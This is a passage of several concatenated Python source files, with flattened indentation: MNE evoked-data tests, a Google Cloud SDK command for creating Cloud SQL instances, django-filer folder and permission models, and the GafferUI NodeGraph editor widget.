assert_raises(ValueError, combine_evoked, [ev1, ev2], weights='foo')
assert_raises(ValueError, combine_evoked, [ev1, ev2], weights=[1])
# grand average
evoked1, evoked2 = read_evokeds(fname, condition=[0, 1], proj=True)
ch_names = evoked1.ch_names[2:]
evoked1.info['bads'] = ['EEG 008'] # test interpolation
evoked1.drop_channels(evoked1.ch_names[:1])
evoked2.drop_channels(evoked2.ch_names[1:2])
gave = grand_average([evoked1, evoked2])
assert_equal(gave.data.shape, [len(ch_names), evoked1.data.shape[1]])
assert_equal(ch_names, gave.ch_names)
assert_equal(gave.nave, 2)
def test_array_epochs():
"""Test creating evoked from array
"""
tempdir = _TempDir()
# creating
rng = np.random.RandomState(42)
data1 = rng.randn(20, 60)
sfreq = 1e3
ch_names = ['EEG %03d' % (i + 1) for i in range(20)]
types = ['eeg'] * 20
info = create_info(ch_names, sfreq, types)
evoked1 = EvokedArray(data1, info, tmin=-0.01)
# save, read, and compare evokeds
tmp_fname = op.join(tempdir, 'evkdary-ave.fif')
evoked1.save(tmp_fname)
evoked2 = read_evokeds(tmp_fname)[0]
data2 = evoked2.data
assert_allclose(data1, data2)
assert_allclose(evoked1.times, evoked2.times)
assert_equal(evoked1.first, evoked2.first)
assert_equal(evoked1.last, evoked2.last)
assert_equal(evoked1.kind, evoked2.kind)
assert_equal(evoked1.nave, evoked2.nave)
# now compare with EpochsArray (with single epoch)
data3 = data1[np.newaxis, :, :]
events = np.c_[10, 0, 1]
evoked3 = EpochsArray(data3, info, events=events, tmin=-0.01).average()
assert_allclose(evoked1.data, evoked3.data)
assert_allclose(evoked1.times, evoked3.times)
assert_equal(evoked1.first, evoked3.first)
assert_equal(evoked1.last, evoked3.last)
assert_equal(evoked1.kind, evoked3.kind)
assert_equal(evoked1.nave, evoked3.nave)
# test match between channels info and data
ch_names = ['EEG %03d' % (i + 1) for i in range(19)]
types = ['eeg'] * 19
info = create_info(ch_names, sfreq, types)
assert_raises(ValueError, EvokedArray, data1, info, tmin=-0.01)
def test_add_channels():
"""Test evoked splitting / re-appending channel types
"""
evoked = read_evokeds(fname, condition=0)
evoked.info['buffer_size_sec'] = None
evoked_eeg = evoked.pick_types(meg=False, eeg=True, copy=True)
evoked_meg = evoked.pick_types(meg=True, copy=True)
evoked_stim = evoked.pick_types(meg=False, stim=True, copy=True)
evoked_eeg_meg = evoked.pick_types(meg=True, eeg=True, copy=True)
evoked_new = evoked_meg.add_channels([evoked_eeg, evoked_stim], copy=True)
assert_true(all(ch in evoked_new.ch_names
for ch in evoked_stim.ch_names + evoked_meg.ch_names))
evoked_new = evoked_meg.add_channels([evoked_eeg], copy=True)
    assert_true(all(ch in evoked_new.ch_names for ch in evoked.ch_names))
assert_array_equal(evoked_new.data, evoked_eeg_meg.data)
assert_true(all(ch not in evoked_new.ch_names
for ch in evoked_stim.ch_names))
# Now test errors
evoked_badsf = evoked_eeg.copy()
evoked_badsf.info['sfreq'] = 3.1415927
evoked_eeg = evoked_eeg.crop(-.1, .1)
assert_raises(RuntimeError, evoked_meg.add_channels, [evoked_badsf])
assert_raises(AssertionError, evoked_meg.add_channels, [evoked_eeg])
assert_raises(ValueError, evoked_meg.add_channels, [evoked_meg])
assert_raises(AssertionError, evoked_meg.add_channels, evoked_badsf)
# Copyright 2013 Google Inc. All Rights Reserved.
"""Creates a new Cloud SQL instance."""
import argparse
import logging
from googlecloudapis.apitools.base import py as apitools_base
from googlecloudsdk.calliope import arg_parsers
from googlecloudsdk.calliope import base
from googlecloudsdk.calliope import exceptions
from googlecloudsdk.core import log
from googlecloudsdk.core import remote_completion
from googlecloudsdk.core.console import console_io
from googlecloudsdk.core.util import list_printer
from googlecloudsdk.sql import util
@base.ReleaseTracks(base.ReleaseTrack.GA)
class Create(base.Command):
"""Creates a new Cloud SQL instance."""
@staticmethod
def Args(parser):
"""Args is called by calliope to gather arguments for this command.
    Please add arguments in alphabetical order, except for the 'no-' or
    'clear-' counterpart of an argument, which may follow the argument itself.
Args:
parser: An argparse parser that you can use to add arguments that go
on the command line after this command. Positional arguments are
allowed.
"""
parser.add_argument(
'--activation-policy',
required=False,
choices=['ALWAYS', 'NEVER', 'ON_DEMAND'],
default=None,
help='The activation policy for this instance. This specifies when the '
'instance should be activated and is applicable only when the '
'instance state is RUNNABLE.')
parser.add_argument(
'--assign-ip',
required=False,
action='store_true',
help='Specified if the instance must be assigned an IP address.')
parser.add_argument(
'--authorized-gae-apps',
type=arg_parsers.ArgList(min_length=1),
metavar='APP',
action=arg_parsers.FloatingListValuesCatcher(),
required=False,
default=[],
help='List of App Engine app IDs that can access this instance.')
parser.add_argument(
'--authorized-networks',
type=arg_parsers.ArgList(min_length=1),
metavar='NETWORK',
action=arg_parsers.FloatingListValuesCatcher(),
required=False,
default=[],
help='The list of external networks that are allowed to connect to the'
' instance. Specified in CIDR notation, also known as \'slash\' '
'notation (e.g. 192.168.100.0/24).')
parser.add_argument(
'--backup-start-time',
required=False,
help='The start time of daily backups, specified in the 24 hour format '
'- HH:MM, in the UTC timezone.')
parser.add_argument(
'--no-backup',
required=False,
action='store_true',
help='Specified if daily backup should be disabled.')
parser.add_argument(
'--database-version',
required=False,
choices=['MYSQL_5_5', 'MYSQL_5_6'],
default='MYSQL_5_5',
help='The database engine type and version. Can be MYSQL_5_5 or '
'MYSQL_5_6.')
parser.add_argument(
'--enable-bin-log',
required=False,
action='store_true',
help='Specified if binary log should be enabled. If backup '
'configuration is disabled, binary log must be disabled as well.')
parser.add_argument(
'--follow-gae-app',
required=False,
help='The App Engine app this instance should follow. It must be in '
'the same region as the instance.')
parser.add_argument(
'--gce-zone',
required=False,
help='The preferred Compute Engine zone (e.g. us-central1-a, '
'us-central1-b, etc.).')
parser.add_argument(
'instance',
help='Cloud SQL instance ID.')
parser.add_argument(
'--master-instance-name',
required=False,
help='Name of the instance which will act as master in the replication '
'setup. The newly created instance will be a read replica of the '
'specified master instance.')
parser.add_argument(
'--pricing-plan',
'-p',
required=False,
choices=['PER_USE', 'PACKAGE'],
default='PER_USE',
help='The pricing plan for this instance.')
parser.add_argument(
'--region',
required=False,
choices=['asia-east1', 'europe-west1', 'us-central', 'us-east1'],
default='us-central',
help='The geographical region. Can be asia-east1, europe-west1, '
'or us-central.')
parser.add_argument(
'--replication',
required=False,
choices=['SYNCHRONOUS', 'ASYNCHRONOUS'],
default=None,
help='The type of replication this instance uses.')
parser.add_argument(
'--require-ssl',
required=False,
action='store_true',
help='Specified if users connecting over IP must use SSL.')
parser.add_argument(
'--tier',
'-t',
required=False,
default='D1',
help='The tier of service for this instance, for example D0, D1.')
parser.add_argument(
'--database-flags',
type=arg_parsers.ArgDict(min_length=1),
metavar='FLAG=VALUE',
required=False,
action=arg_parsers.FloatingListValuesCatcher(),
help='A space-separated list of database flags to set on the instance. '
'Use an equals sign to separate flag name and value. Flags without '
'values, like skip_grant_tables, can be written out without a value '
'after, e.g., `skip_grant_tables=`. Use on/off for '
'booleans. View the Instance Resource API for allowed flags. '
'(e.g., `--database-flags max_allowed_packet=55555 skip_grant_tables= '
'log_output=1`)')
parser.add_argument(
'--async',
action='store_true',
help='Do not wait for the operation to complete.')
@util.ReraiseHttpException
def Run(self, args):
"""Creates a new Cloud SQL instance.
Args:
args: argparse.Namespace, The arguments that this command was invoked
with.
Returns:
A dict object representing the operations resource describing the create
operation if the create was successful.
    Raises:
      HttpException: An HTTP error response was received while executing the
        api request.
      ToolException: An error other than an HTTP error occurred while
        executing the command.
"""
# Added this temporarily for debugging SQL instance creation failures
log.SetVerbosity(logging.DEBUG)
sql_client = self.context['sql_client']
sql_messages = self.context['sql_messages']
resources = self.context['registry']
util.ValidateInstanceName(args.instance)
instance_ref = resources.Parse(args.instance, collection='sql.instances')
instance_resource = util.ConstructInstanceFromArgs(sql_messages, args)
if args.master_instance_name:
replication = 'ASYNCHRONOUS'
activation_policy = 'ALWAYS'
else:
replication = 'SYNCHRONOUS'
activation_policy = 'ON_DEMAND'
if not args.replication:
instance_resource.settings.replicationType = replication
if not args.activation_policy:
instance_resource.settings.activationPolicy = activation_policy
instance_resource.project = instance_ref.project
instance_resource.instance = instance_ref.instance
operation_ref = None
if args.pricing_plan == 'PACKAGE':
if not console_io.PromptContinue(
'Charges will begin accruing immediately. Really create Cloud '
'SQL instance?'):
raise exceptions.ToolException('canceled by the user.')
try:
result = sql_client.instances.Insert(instance_resource)
operation_ref = resources.Create(
'sql.operations',
operation=result.operation,
project=instance_ref.project,
instance=instance_ref.instance,
)
if args.async:
return sql_client.operations.Get(operation_ref.Request())
util.WaitForOperation(
sql_client, operation_ref, 'Creating Cloud SQL instance')
log.CreatedResource(instance_ref)
      new_resource = sql_client.instances.Get(instance_ref.Request())
cache = remote_completion.RemoteCompletion()
cache.AddToCache(instance_ref.SelfLink())
      return new_resource
except apitools_base.HttpError:
log.debug('operation : %s', str(operation_ref))
raise
def Display(self, unused_args, result):
"""Display prints information about what just happened to stdout.
Args:
unused_args: The same as the args in Run.
result: The database created, or the operation if async.
"""
if result.kind == 'sql#instance':
list_printer.PrintResourceList('sql.instances', [result])
else:
self.format(result)
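# A minimal standalone sketch (not part of the SDK) of the defaulting rule
# implemented in Run() above: read replicas (--master-instance-name given)
# default to ASYNCHRONOUS replication with an ALWAYS activation policy,
# standalone instances default to SYNCHRONOUS/ON_DEMAND, and explicit flag
# values always win.
def _default_replication_settings(master_instance_name, replication=None,
                                  activation_policy=None):
  if master_instance_name:
    default_replication, default_activation = 'ASYNCHRONOUS', 'ALWAYS'
  else:
    default_replication, default_activation = 'SYNCHRONOUS', 'ON_DEMAND'
  return (replication or default_replication,
          activation_policy or default_activation)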
# ===== next source file: django-filer folder models =====
import mptt
from django.utils.translation import ugettext_lazy as _
from django.db import models
from django.db.models import Q
from django.contrib.auth import models as auth_models
from django.conf import settings
from django.core import urlresolvers
from filer.models import mixins
'''
Managers
'''
class FolderManager(models.Manager):
def with_bad_metadata(self):
return self.get_query_set().filter(has_all_mandatory_data=False)
class FolderPermissionManager(models.Manager):
def get_read_id_list(self, user):
"""
Give a list of a Folders where the user has read rights or the string
"All" if the user has all rights.
"""
return self.__get_id_list(user, "can_read")
def get_edit_id_list(self, user):
return self.__get_id_list(user, "can_edit")
def get_add_children_id_list(self, user):
return self.__get_id_list(user, "can_add_children")
def __get_id_list(self, user, attr):
if user.is_superuser:
return 'All'
allow_list = []
deny_list = []
group_ids = user.groups.all().values_list('id', flat=True)
q = Q(user=user)|Q(group__in=group_ids)|Q(everybody=True)
perms = self.filter(q).order_by('folder__tree_id', 'folder__level',
'folder__lft')
for perm in perms:
if perm.folder:
folder_id = perm.folder.id
else:
folder_id = None
if perm.type == FolderPermission.ALL:
if getattr(perm, attr):
allow_list = list(Folder.objects.all().values_list('id', flat=True))
else:
return []
if getattr(perm, attr):
if folder_id not in allow_list:
allow_list.append(folder_id)
if folder_id in deny_list:
deny_list.remove(folder_id)
else:
if folder_id not in deny_list:
deny_list.append(folder_id)
if folder_id in allow_list:
allow_list.remove(folder_id)
if perm.type == FolderPermission.CHILDREN:
for id in perm.folder.get_descendants().values_list('id', flat=True):
if getattr(perm, attr):
if id not in allow_list:
allow_list.append(id)
if id in deny_list:
deny_list.remove(id)
else:
if id not in deny_list:
deny_list.append(id)
if id in allow_list:
allow_list.remove(id)
return allow_list
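# Usage sketch (hypothetical view code, not part of this module): resolve the
# folders a user may read, remembering that superusers get the string 'All'
# back instead of an id list.
#
#     readable = FolderPermission.objects.get_read_id_list(request.user)
#     if readable != 'All':
#         folders = Folder.objects.filter(id__in=readable)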
'''
Models
'''
class Folder(models.Model, mixins.IconsMixin):
"""
Represents a Folder that things (files) can be put into. Folders are *NOT*
mirrored in the Filesystem and can have any unicode chars as their name.
Other models may attach to a folder with a ForeignKey. If the related name
ends with "_files" they will automatically be listed in the
folder.files list along with all the other models that link to the folder
in this way. Make sure the linked models obey the AbstractFile interface
(Duck Type).
"""
file_type = 'Folder'
is_root = False
can_have_subfolders = True
_icon = 'plainfolder'
parent = models.ForeignKey('self', null=True, blank=True, related_name='children')
name = models.CharField(max_length=255)
owner = models.ForeignKey(auth_models.User, related_name='filer_owned_folders', null=True, blank=True)
uploaded_at = models.DateTimeField(auto_now_add=True)
created_at = models.DateTimeField(auto_now_add=True)
modified_at = models.DateTimeField(auto_now=True)
objects = FolderManager()
@property
def file_count(self):
if not hasattr(self, '_file_count_cache'):
self._file_count_cache = self.files.count()
return self._file_count_cache
@property
def children_count(self):
if not hasattr(self, '_children_count_cache'):
self._children_count_cache = self.children.count()
return self._children_count_cache
@property
def item_count(self):
return self.file_count + self.children_count
@property
def files(self):
return self.all_files.all()
@property
def logical_path(self):
"""
Gets logical path of the folder in the tree structure.
Used to generate breadcrumbs
"""
folder_path = []
if self.parent:
folder_path.extend(self.parent.get_ancestors())
folder_path.append(self.parent)
return folder_path
def has_edit_permission(self, request):
return self.has_generic_permission(request, 'edit')
def has_read_permission(self, request):
return self.has_generic_permission(request, 'read')
def has_add_children_permission(self, request):
return self.has_generic_permission(request, 'add_children')
def has_generic_permission(self, request, type):
"""
Return true if the current user has permission on this
folder. Return the string 'ALL' if the user has all rights.
"""
user = request.user
if not user.is_authenticated() or not user.is_staff:
return False
elif user.is_superuser:
return True
elif user == self.owner:
return True
else:
att_name = "permission_%s_cache" % type
if not hasattr(self, "permission_user_cache") or \
not hasattr(self, att_name) or \
request.user.pk != self.permission_user_cache.pk:
func = getattr(FolderPermission.objects, "get_%s_id_list" % type)
permission = func(user)
self.permission_user_cache = request.user
if permission == "All" or self.id in permission:
setattr(self, att_name, True)
else:
setattr(self, att_name, False)
return getattr(self, att_name)
def get_admin_url_path(self):
return urlresolvers.reverse('admin:filer_folder_change', args=(self.id,))
def get_admin_directory_listing_url_path(self):
return urlresolvers.reverse('admin:filer-directory_listing', args=(self.id,))
def __unicode__(self):
return u"%s" % (self.name,)
class Meta:
unique_together = (('parent','name'),)
ordering = ('name',)
permissions = (("can_use_directory_listing", "Can use directory listing"),)
app_label = 'filer'
# MPTT registration
try:
mptt.register(Folder)
except mptt.AlreadyRegistered:
pass
class FolderPermission(models.Model):
ALL = 0
THIS = 1
CHILDREN = 2
TYPES = (
(ALL, _('all items') ),
(THIS, _('this item only') ),
(CHILDREN, _('this item and all children') ),
)
folder = models.ForeignKey(Folder, null=True, blank=True)
type = models.SmallIntegerField(_('type'), choices=TYPES, default=0)
user = models.ForeignKey(auth_models.User, related_name="filer_folder_permissions", verbose_name=_("user"), blank=True, null=True)
group = models.ForeignKey(auth_models.Group, related_name="filer_folder_permissions", verbose_name=_("group"), blank=True, null=True)
everybody = models.BooleanField(_("everybody"), default=False)
can_edit = models.BooleanField(_("can edit"), default=True)
can_read = models.BooleanField(_("can read"), default=True)
can_add_children = models.BooleanField(_("can add children"), default=True)
objects = FolderPermissionManager()
def __unicode__(self):
if self.folder:
name = u'%s' % self.folder
else:
name = u'All Folders'
ug = []
if self.everybody:
user = 'Everybody'
else:
if self.group:
ug.append(u"Group: %s" % self.group)
if self.user:
ug.append(u"User: %s" % self.user)
usergroup = " ".join(ug)
perms = []
for s in ['can_edit', 'can_read', 'can_add_children']:
if getattr(self, s):
perms.append(s)
perms = ', '.join(perms)
return u"Folder: '%s'->%s [%s] [%s]" % (name, unicode(self.TYPES[self.type][1]), perms, usergroup)
class Meta:
verbose_name = _('Folder Permission')
verbose_name_plural = _('Folder Permissions')
app_label = 'filer'
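# Sketch of granting a permission (object names are illustrative): THIS covers
# just the folder row, CHILDREN covers the folder and all of its descendants,
# and ALL ignores the folder field entirely.
#
#     FolderPermission.objects.create(
#         folder=docs_folder, type=FolderPermission.CHILDREN,
#         group=editors_group, can_read=True, can_edit=False,
#         can_add_children=False)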
# ===== next source file: GafferUI NodeGraph editor =====
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
from __future__ import with_statement
import IECore
import Gaffer
import GafferUI
class NodeGraph( GafferUI.EditorWidget ) :
def __init__( self, scriptNode, **kw ) :
self.__gadgetWidget = GafferUI.GadgetWidget(
bufferOptions = set( [
GafferUI.GLWidget.BufferOptions.Double,
] ),
)
GafferUI.EditorWidget.__init__( self, self.__gadgetWidget, scriptNode, **kw )
graphGadget = GafferUI.GraphGadget( self.scriptNode() )
self.__rootChangedConnection = graphGadget.rootChangedSignal().connect( Gaffer.WeakMethod( self.__rootChanged ) )
self.__gadgetWidget.getViewportGadget().setChild( graphGadget )
self.__gadgetWidget.getViewportGadget().setDragTracking( True )
self.__frame( scriptNode.selection() )
self.__buttonPressConnection = self.__gadgetWidget.buttonPressSignal().connect( Gaffer.WeakMethod( self.__buttonPress ) )
self.__keyPressConnection = self.__gadgetWidget.keyPressSignal().connect( Gaffer.WeakMethod( self.__keyPress ) )
self.__buttonDoubleClickConnection = self.__gadgetWidget.buttonDoubleClickSignal().connect( Gaffer.WeakMethod( self.__buttonDoubleClick ) )
self.__dragEnterConnection = self.__gadgetWidget.dragEnterSignal().connect( Gaffer.WeakMethod( self.__dragEnter ) )
self.__dropConnection = self.__gadgetWidget.dropSignal().connect( Gaffer.WeakMethod( self.__drop ) )
self.__nodeMenu = None
## Returns the internal GadgetWidget holding the GraphGadget.
def graphGadgetWidget( self ) :
return self.__gadgetWidget
## Returns the internal Gadget used to draw the graph. This may be
# modified directly to set up appropriate filters etc. This is just
# a convenience method returning graphGadgetWidget().getViewportGadget().getChild().
def graphGadget( self ) :
return self.graphGadgetWidget().getViewportGadget().getChild()
## Frames the specified nodes in the viewport. If extend is True
# then the current framing will be extended to include the specified
# nodes, if False then the framing will be reset to frame only the
# nodes specified.
def frame( self, nodes, extend=False ) :
self.__frame( nodes, extend )
def getTitle( self ) :
title = super( NodeGraph, self ).getTitle()
		if title :
return title
result = IECore.CamelCase.toSpaced( self.__class__.__name__ )
root = self.graphGadget().getRoot()
if not root.isSame( self.scriptNode() ) :
result += " : " + root.relativeName( self.scriptNode() ).replace( ".", " / " )
return result
__plugContextMenuSignal = Gaffer.Signal3()
## Returns a signal which is emitted to create a context menu for a
# plug in the graph. Slots may connect to this signal to edit the
# menu definition on the fly - the signature for the signal is
# ( nodeGraph, plug, menuDefinition ) and the menu definition should just be
# edited in place.
@classmethod
def plugContextMenuSignal( cls ) :
return cls.__plugContextMenuSignal
__connectionContextMenuSignal = Gaffer.Signal3()
## Returns a signal which is emitted to create a context menu for a
# connection in the graph. Slots may connect to this signal to edit the
# menu definition on the fly - the signature for the signal is
# ( nodeGraph, destinationPlug, menuDefinition ) and the menu definition
# should just be edited in place.
@classmethod
def connectionContextMenuSignal( cls ) :
return cls.__connectionContextMenuSignal
__nodeContextMenuSignal = Gaffer.Signal3()
## Returns a signal which is emitted to create a context menu for a
# node in the graph. Slots may connect to this signal to edit the
# menu definition on the fly - the signature for the signal is
# ( nodeGraph, node, menuDefinition ) and the menu definition should just be
# edited in place. Typically you would add slots to this signal
# as part of a startup script.
@classmethod
def nodeContextMenuSignal( cls ) :
return cls.__nodeContextMenuSignal
## May be used from a slot attached to nodeContextMenuSignal() to install some
# standard menu items for modifying the connection visibility for a node.
@classmethod
def appendConnectionVisibilityMenuDefinitions( cls, nodeGraph, node, menuDefinition ) :
menuDefinition.append( "/ConnectionVisibilityDivider", { "divider" : True } )
menuDefinition.append(
"/Show Input Connections",
{
"checkBox" : IECore.curry( cls.__getNodeInputConnectionsVisible, nodeGraph.graphGadget(), node ),
"command" : IECore.curry( cls.__setNodeInputConnectionsVisible, nodeGraph.graphGadget(), node )
}
)
menuDefinition.append(
"/Show Output Connections",
{
"checkBox" : IECore.curry( cls.__getNodeOutputConnectionsVisible, nodeGraph.graphGadget(), node ),
"command" : IECore.curry( cls.__setNodeOutputConnectionsVisible, nodeGraph.graphGadget(), node )
}
)
## May be used from a slot attached to nodeContextMenuSignal() to install a
# standard menu item for modifying the enabled state of a node.
@classmethod
def appendEnabledPlugMenuDefinitions( cls, nodeGraph, node, menuDefinition ) :
enabledPlug = node.enabledPlug() if isinstance( node, Gaffer.DependencyNode ) else None
if enabledPlug is not None :
menuDefinition.append( "/EnabledDivider", { "divider" : True } )
menuDefinition.append(
"/Enabled",
{
"command" : IECore.curry( cls.__setEnabled, node ),
"checkBox" : enabledPlug.getValue(),
"active" : enabledPlug.settable()
}
)
__nodeDoubleClickSignal = Gaffer.Signal2()
## Returns a signal which is emitted whenever a node is double clicked.
# Slots should have the signature ( nodeGraph, node ).
@classmethod
def nodeDoubleClickSignal( cls ) :
return cls.__nodeDoubleClickSignal
## Ensures that the specified node has a visible NodeGraph viewing
# it, and returns that editor.
## \todo Consider how this relates to the todo items in NodeSetEditor.acquire().
@classmethod
def acquire( cls, rootNode ) :
if isinstance( rootNode, Gaffer.ScriptNode ) :
script = rootNode
else :
script = rootNode.scriptNode()
scriptWindow = GafferUI.ScriptWindow.acquire( script )
tabbedContainer = None
for editor in scriptWindow.getLayout().editors( type = GafferUI.NodeGraph ) :
if rootNode.isSame( editor.graphGadget().getRoot() ) :
editor.parent().setCurrent( editor )
return editor
editor = NodeGraph( script )
editor.graphGadget().setRoot( rootNode )
scriptWindow.getLayout().addEditor( editor )
return editor
def __repr__( self ) :
return "GafferUI.NodeGraph( scriptNode )"
def _nodeMenu( self ) :
if self.__nodeMenu is None :
self.__nodeMenu = GafferUI.Menu( GafferUI.NodeMenu.acquire( self.scriptNode().applicationRoot() ).definition(), searchable=True )
self.__nodeMenuVisibilityChangedConnection = self.__nodeMenu.visibilityChangedSignal().connect( Gaffer.WeakMethod( self.__nodeMenuVisibilityChanged ) )
return self.__nodeMenu
def __nodeMenuVisibilityChanged( self, widget ) :
assert( widget is self.__nodeMenu )
if not self.__nodeMenu.visible() :
# generally we steal focus on mouse enter (implemented in GadgetWidget),
# but when the node menu closes we may not get an enter event, so we have to steal
# the focus back here.
self.__gadgetWidget._qtWidget().setFocus()
def __buttonPress( self, widget, event ) :
if event.buttons & GafferUI.ButtonEvent.Buttons.Right :
# right click - display either the node creation popup menu
# or a menu specific to the node/plug/connection under the
# mouse if possible.
viewport = self.__gadgetWidget.getViewportGadget()
gadgets = viewport.gadgetsAt( IECore.V2f( event.line.p1.x, event.line.p1.y ) )
if len( gadgets ) :
overrideMenuDefinition = IECore.MenuDefinition()
overrideMenuTitle = None
if isinstance( gadgets[0], GafferUI.Nodule ) :
self.plugContextMenuSignal()( self, gadgets[0].plug(), overrideMenuDefinition )
overrideMenuTitle = gadgets[0].plug().relativeName( self.graphGadget().getRoot() )
elif isinstance( gadgets[0], GafferUI.ConnectionGadget ) :
self.connectionContextMenuSignal()( self, gadgets[0].dstNodule().plug(), overrideMenuDefinition )
overrideMenuTitle = "-> " + gadgets[0].dstNodule().plug().relativeName( self.graphGadget().getRoot() )
else :
nodeGadget = gadgets[0]
if not isinstance( nodeGadget, GafferUI.NodeGadget ) :
nodeGadget = nodeGadget.ancestor( GafferUI.NodeGadget.staticTypeId() )
if nodeGadget is not None :
self.nodeContextMenuSignal()( self, nodeGadget.node(), overrideMenuDefinition )
overrideMenuTitle = nodeGadget.node().getName()
if len( overrideMenuDefinition.items() ) :
menuDefinition = overrideMenuDefinition
self._m = GafferUI.Menu( menuDefinition, title=overrideMenuTitle )
self._m.popup( self )
return True
self._nodeMenu().popup( self )
return True
return False
def __nodeGadgetAt( self, position ) :
viewport = self.__gadgetWidget.getViewportGadget()
line = viewport.rasterToGadgetSpace( IECore.V2f( position.x, position.y ) )
return self.graphGadget().nodeGadgetAt( line )
def __keyPress( self, widget, event ) :
if event.key == "F" :
self.__frame( self.scriptNode().selection() )
return True
## \todo This cursor key navigation might not make sense for all applications,
# so we should move it into BoxUI and load it in a config file that the gui app uses.
# I think this implies that every Widget.*Signal() method should have a
# Widget.static*Signal() method to allow global handlers to be registered by widget type.
# We already have a mix of static/nonstatic signals for menus, so that might make a nice
# generalisation.
elif event.key == "Down" :
selection = self.scriptNode().selection()
if selection.size() and isinstance( selection[0], Gaffer.Box ) :
self.graphGadget().setRoot( selection[0] )
return True
elif event.key == "Up" :
root = self.graphGadget().getRoot()
if isinstance( root, Gaffer.Box ) :
self.graphGadget().setRoot( root.parent() )
return True
elif event.key == "Tab" :
self._nodeMenu().popup( self )
return True
return False
def __frame( self, nodes, extend = False ) :
graphGadget = self.graphGadget()
# get the bounds of the nodes
bound = IECore.Box3f()
for node in nodes :
nodeGadget = graphGadget.nodeGadget( node )
if nodeGadget :
bound.extendBy( nodeGadget.transformedBound( graphGadget ) )
# if there were no nodes then use the bound of the whole
# graph.
if bound.isEmpty() :
bound = graphGadget.bound()
# if there's still nothing then an arbitrary area in the centre of the world
if bound.isEmpty() :
bound = IECore.Box3f( IECore.V3f( -10, -10, 0 ), IECore.V3f( 10, 10, 0 ) )
# pad it a little bit so
# it sits nicer in the frame
bound.min -= IECore.V3f( 1, 1, 0 )
bound.max += IECore.V3f( 1, 1, 0 )
if extend :
# we're extending the existing framing, which we assume the
# user was happy with other than it not showing the nodes in question.
# so we just take the union of the existing frame and the one for the nodes.
cb = self.__currentFrame()
bound.extendBy( IECore.Box3f( IECore.V3f( cb.min.x, cb.min.y, 0 ), IECore.V3f( cb.max.x, cb.max.y, 0 ) ) )
else :
# we're reframing from scratch, so the frame for the nodes is all we need.
# we do however want to make sure that we don't zoom in too far if the node
# bounds are small, as having a single node filling the screen is of little use -
# it's better to see some context around it.
boundSize = bound.size()
widgetSize = IECore.V3f( self._qtWidget().width(), self._qtWidget().height(), 0 )
pixelsPerUnit = widgetSize / boundSize
adjustedPixelsPerUnit = min( pixelsPerUnit.x, pixelsPerUnit.y, 10 )
newBoundSize = widgetSize / adjustedPixelsPerUnit
boundCenter = bound.center()
bound.min = boundCenter - newBoundSize / 2.0
bound.max = boundCenter + newBoundSize / 2.0
self.__gadgetWidget.getViewportGadget().frame( bound )
def __buttonDoubleClick( self, widget, event ) :
nodeGadget = self.__nodeGadgetAt( event.line.p1 )
if nodeGadget is not None :
return self.nodeDoubleClickSignal()( self, nodeGadget.node() )
def __dragEnter( self, widget, event ) :
if event.sourceWidget is self.__gadgetWidget :
return False
if self.__dropNodes( event.data ) :
return True
return False
def __drop( self, widget, event ) :
if event.sourceWidget is self.__gadgetWidget :
return False
self.__frame( self.__dropNodes( event.data ) )
return True
def __dropNodes( self, dragData ) :
if isinstance( dragData, Gaffer.Node ) :
return [ dragData ]
elif isinstance( dragData, Gaffer.Plug ) :
return [ dragData.node() ]
elif isinstance( dragData, Gaffer.Set ) :
return [ x for x in dragData if isinstance( x, Gaffer.Node ) ]
return []
def __currentFrame( self ) :
camera = self.graphGadgetWidget().getViewportGadget().getCamera()
frame = camera.parameters()["screenWindow"].value
translation = camera.getTransform().matrix.translation()
frame.min += IECore.V2f( translation.x, translation.y )
frame.max += IECore.V2f( translation.x, translation.y )
return frame
def __rootChanged( self, graphGadget, previousRoot ) :
# save/restore the current framing so jumping in
# and out of Boxes isn't a confusing experience.
def __framePlug( node, createIfMissing = False ) :
plugName = "__nodeGraphFraming%d" % id( self )
result = node.getChild( plugName )
if result is None and createIfMissing :
result = Gaffer.Box2fPlug( plugName, flags = Gaffer.Plug.Flags.Default & ( ~Gaffer.Plug.Flags.Serialisable ) )
node.addChild( result )
return result
__framePlug( previousRoot, True ).setValue( self.__currentFrame() )
newFramePlug = __framePlug( self.graphGadget().getRoot() )
if newFramePlug is not None :
frame = newFramePlug.getValue()
self.graphGadgetWidget().getViewportGadget().frame(
IECore.Box3f( IECore.V3f( frame.min.x, frame.min.y, 0 ), IECore.V3f( frame.max.x, frame.max.y, 0 ) )
)
else :
self.__frame( self.graphGadget().getRoot().children( Gaffer.Node.staticTypeId() ) )
# do what we need to do to keep our title up to date.
if graphGadget.getRoot().isSame( self.scriptNode() ) :
self.__rootNameChangedConnection = None
self.__rootParentChangedConnection = None
else :
self.__rootNameChangedConnection = graphGadget.getRoot().nameChangedSignal().connect( Gaffer.WeakMethod( self.__rootNameChanged ) )
self.__rootParentChangedConnection = graphGadget.getRoot().parentChangedSignal().connect( Gaffer.WeakMethod( self.__rootParentChanged ) )
self.titleChangedSignal()( self )
def __rootNameChanged( self, root ) :
self.titleChangedSignal()( self )
